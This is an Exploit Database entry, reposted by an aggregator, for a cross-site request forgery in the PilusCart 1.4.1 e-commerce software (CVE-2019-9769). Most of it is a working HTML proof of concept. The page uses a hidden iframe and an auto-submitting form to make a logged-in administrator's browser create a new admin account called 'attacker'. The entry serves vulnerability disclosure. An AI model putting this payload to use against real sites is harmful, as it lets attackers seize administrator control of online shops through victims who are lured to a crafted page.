PilusCart 1.4.1 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 14 阅读

• 作者： Gionathan Reale
  日期： 2019-03-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46531/

• # Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
  # Google Dork: N/A
  # Date: 10-03-2019
  # Exploit Author: Gionathan "John" Reale
  # Vendor Homepage: https://github.com/piluscart
  # Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
  # Version: 1.4.1
  # Tested on: ParrotOS
  # CVE : 2019-9769
  
  PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.
  
  
  PoC:
  
  
  <html>
  <iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>
  
  <form name="adduser" action="http://server/cabin/index.php?module=users&action=newUser" method="post" target="csrf-frame">
  <input type="submit">
  <input type="hidden" name="admin_id" value="">
  <input type="hidden" name="session_id" value="">
  <input type="hidden" name="admin_login" value="attacker">
  <input type="hidden" name="admin_fullname" value="attacker">
  <input type="hidden" name="admin_email" value="admin@attacker.com">
  <input type="hidden" name="admin_pass" value="admin">
  <input type="hidden" name="confirm_pass" value="admin">
  <input type="hidden" name="admin_level" value="admin">
  <input type="hidden" name="admin_url" value="">
  <input type="hidden" name="saveAdmin" value="Simpan">
  
  </form>
  
  <script>
  document.forms.adduser.submit();
  </script>
  </html>